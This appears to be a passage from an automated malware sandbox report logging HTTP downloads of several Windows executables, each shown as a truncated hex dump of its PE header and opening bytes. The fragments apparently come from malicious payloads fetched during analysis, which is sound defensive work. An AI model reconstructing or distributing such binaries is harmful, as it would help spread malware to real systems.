80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e7 65 00 00 4f 00 00 00 00 80 00 00 b8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 34 65 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 46 00 00 00 20 00 00 00 48 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 06 00 00 00 80 00 00 00 08 00 00 00 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 00 00 00 02 00 00 00 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 66 00 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 36 00 00 dc 2c 00 00 03 00 02 00 10 00 00 06 c4 63 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 b5 00 00 00 01 00 00 11 02 14 7d 1c 00 00 04 02 28 14 00 00 0a 00 00 02 28 06 00 00 06 00 28 05 00 00 06 00 28 03 00 00 06 00 02 28 0b 00 00 06 00 02 28 0a 00 00 06 00 7e 19 00 00 04 72 01 00 00 70 6f 15 00 00 0a 0a 06 2c 30 00 7e 03 00 00 04 7e 12 00 00 04 72 07 00 00 70 16 28 04 00 00 06 00 7e 0f 00 00 04 7e 12 00 00 04 72 23 00 00 70 16 28 04 00 00 06 00 00 2b 18 00 7e 02 00 00 04 7e 12 00 00 04 72 07 00 00 70 16 28 04 00 00 06 00 00 7e 01 00 00 04 7e 12 00 00 04 72 43 00 00 70 16 28 04 00 00 06 00 28 08 00 00 06 00 28 0c 00 00 06 00 02 28 0e 00 00 06 00 2a 00 00 00 13 30 03 00 21 00 00 00 02 00 00 11 00 02 28 16 00 00 0a 0a 06 25 6f 17 00 00 0a 20 80 00 00 00 60 6f 18 00 00 0a 00 06 0b 2b 00 07 2a 00 00 00 1b 30 04 00 a7 01 00 00 03 00 00 11 00 00 20 00 0f 00 00 28 19 00 00 0a 00 20 10 27 00 00 8d 31 00 00 01 0a 16 0b 16 0c 73 1a 00 00 0a 0d 09 7e 10 00 00 04 6f 1b 00 00 0a 13 04 11 04 73 1c 00 00 0a 13 05 00 06 16 72 5b
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 866906Last-Modified: Fri, 24 Jan 2025 12:37:12 GMTConnection: keep-aliveETag: "67938978-d3a5a"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 62 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7e 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 00 11 00 00 04 00 00 e2 fd 0d 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 6a ed 00 00 00 00 00 00 00 00 00 00 e2 10 0d 00 78 29 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 6a ed 00 00 00 00 10 00 00 ee 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 f0 10 00 00 10 00 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 1387520Last-Modified: Thu, 09 Jan 2025 21:00:28 GMTConnection: keep-aliveETag: "678038ec-152c00"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 ac 0a 00 00 7c 0a 00 00 00 00 00 30 ba 0a 00 00 10 00 00 00 c0 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 16 00 00 04 00 00 aa db 0d 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 f0 0a 00 32 27 00 00 00 e0 0b 00 a0 32 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0b 00 70 93 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 00 b0 0a 00 00 10 00 00 00 ac 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 00 20 00 00 00 c0 0a 00 00 1e 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 00 10 00 00 00 e0 0a 00 00 10 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 00 30 00 00 00 f0 0a 00 00 28 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 00 10 00 00 00 20 0b 00 00 10 00 00 00 f6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 00 b0 00 00 00 30 0b 00 00 02 00 00 00 f6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 a0 32 0a 00 00 e0 0b 00 00 34 0a 00 00 f8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 0d 00 00 00 00 00 00 74 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 8088728Last-Modified: Wed, 15 Jan 2025 19:13:17 GMTConnection: keep-aliveETag: "678808cd-7b6c98"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3f 37 3a 65 7b 56 54 36 7b 56 54 36 7b 56 54 36 6f 3d 57 37 77 56 54 36 6f 3d 51 37 ae 56 54 36 1d 39 a9 36 7e 56 54 36 29 23 51 37 19 56 54 36 29 23 50 37 68 56 54 36 29 23 57 37 71 56 54 36 6f 3d 50 37 60 56 54 36 7b 56 54 36 67 56 54 36 d3 3f 50 37 4f 54 54 36 e2 24 50 37 14 56 54 36 6f 3d 55 37 6e 56 54 36 7b 56 55 36 2b 57 54 36 bf 23 5d 37 7c 56 54 36 bf 23 50 37 7c 56 54 36 bf 23 51 37 37 56 54 36 bf 23 ab 36 7a 56 54 36 bf 23 56 37 7a 56 54 36 52 69 63 68 7b 56 54 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 ac 2c ad 64 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d 00 50 7b 00 00 10 00 00 00 80 fa 03 00 c5 75 04 00 90 fa 03 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 75 04 00 04 00 00 c4 f4 7b 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc e1 75 04 74 02 00 00 00 e0 75 04 dc 01 00 00 00 f0 71 04 28 ab 02 00 00 50 7b 00 98 1c 00 00 50 e4 75 04 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 d0 75 04 28 00 00 00 20 d3 75 04 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 80 fa 03 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 50 7b 00 00 90 fa 03 00 46 7b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 10 00 00 00 e0 75 04 00 06 00 00 00 4a 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 63488Last-Modified: Wed, 15 Jan 2025 19:13:16 GMTConnection: keep-aliveETag: "678808cc-f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3a 67 81 db 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ec 00 00 00 0a 00 00 00 00 00 00 9e 0a 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 0a 01 00 57 00 00 00 00 20 01 00 ca 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 0c 00 00 00 00 0a 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 ea 00 00 00 20 00 00 00 ec 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ca 06 00 00 00 20 01 00 00 08 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 01 00 00 02 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 01 00 00 00 00 00 48 00 00 00 02 00 05 00 80 8d 00 00 80 7c 00 00 03 00 02 00 7d 00 00 06 10 8c 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2d 66 e4 3b d7 69 16 30 0d 61 6c 25 cb 66 ac 72 ad ee 40 dc 1a c2 fa 0a d5 76 4d ca 57 88 b3 1c 84 5a 09 f5 5d d3 1b 67 47 77 cc 1a 03 3f 39 ee 7f da 9b 3b 74 1a 2b 84 e1 a0 4f 13 83 dc cf e0 c1 c3 d8 27 3a 09 9e 31 b5 17 da bc d2 dd 13 ee 61 58 19 cc 27 e2 f3 6f e5 86 d9 10 08 ce 27 11 1c 62 a6 c4 e9 6e 6c 22 46 b7 c1 a1 ad 9a dd 9a 27 e5 5f 5b 9e 67 28 9f 18 c2 80 97 4b 49 59 51 9a 45 02 cd 52 03 d2 b0 44 1c d1 ee bd 44 82 2d dc 28 35 1d 05 91 7b 2c f1 84 a1 fa 21 47 d6 b1 ca 89 b3 79 64 54 1d 18 b5 b8 9d fa 52 18 b5 c6 37 c2 d0 33 87 50 93 e9 a5 b9 6b 2f 9c 11 e1 45 06 90 2c 41 f1 fa 2c 24 ef 3b f9 e1 4f 14 6c 5f 88 96 c1 79 4b 63 6d 85 c5 e1 99 6c c7 d4 40 6a ee 00 0f 2d 3c bf 43 f8 12 65 1e 9e eb 48 db 56 ae cc 54 cc 3f 71 23 52 75 b9 66 66 58 7b 0e 1c c9 63 75 e1 eb 78 2a df f1 a2 fd 53 80 2f 21 c2 53 bf 76 92 c9 4a a2 a0 cf d3 0d d4 b7 94 47 d4 23 39 35 09 2b 96 59 11 53 5e f0 63 56 03 e1 de c3 fe 32 bc ff 78 27 61 45 79 76 85
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 15472424Last-Modified: Sat, 25 Jan 2025 14:09:53 GMTConnection: keep-aliveETag: "6794f0b1-ec1728"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0b 00 83 9b 7e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 02 19 00 70 0a 00 00 38 02 00 00 00 00 00 98 7f 0a 00 00 10 00 00 00 90 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 90 0d 00 00 04 00 00 29 f3 ec 00 02 00 40 81 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 70 0b 00 71 00 00 00 00 50 0b 00 ec 0f 00 00 00 b0 0c 00 98 d8 00 00 00 00 00 00 00 00 00 00 c0 f3 eb 00 68 23 00 00 00 a0 0b 00 84 0d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 40 17 00 00 00 70 0a 00 00 18 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 74 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 78 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 ae 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 60 0b 00 00 02 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 71 00 00 00 00 70 0b 00 00 02 00 00 00 c0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 18 00 00 00 00 80 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 5d 00 00 00 00 90 0b 00 00 02 00 00 00 c2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 0d 01 00 00 a0 0b 00 00 0e 01 00 00 c4 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 7
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 3672387Last-Modified: Sun, 26 Jan 2025 10:48:58 GMTConnection: keep-aliveETag: "6796131a-380943"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 9e 00 00 00 46 00 00 00 00 00 00 f8 a5 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 30 9d 00 00 00 10 00 00 00 9e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 50 02 00 00 00 b0 00 00 00 04 00 00 00 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 90 0e 00 00 00 c0 00 00 00 00 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 50 09 00 00 00 d0 00 00 00 0a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 e0 00 00 00 00 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 00 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 c4 08 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 2c 00 00 00 10 01 00 00 2c 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: NginxDate: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 6271259Last-Modified: Sat, 25 Jan 2025 04:44:54 GMTConnection: closeETag: "67946c46-5fb11b"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dc a4 68 5a 98 c5 06 09 98 c5 06 09 98 c5 06 09 2c 59 f7 09 94 c5 06 09 2c 59 f5 09 34 c5 06 09 2c 59 f4 09 80 c5 06 09 a3 9b 05 08 8a c5 06 09 a3 9b 03 08 85 c5 06 09 a3 9b 02 08 8a c5 06 09 45 3a cd 09 9f c5 06 09 98 c5 07 09 eb c5 06 09 0a 9b 02 08 89 c5 06 09 0a 9b f9 09 99 c5 06 09 0a 9b 04 08 99 c5 06 09 52 69 63 68 98 c5 06 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 15 9a 8e 5b 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 ec 01 00 00 de 01 00 00 00 00 00 d3 79 00 00 00 10 00 00 00 00 02 00 00 00 40 00 00 10 00 00 00 02 00 00 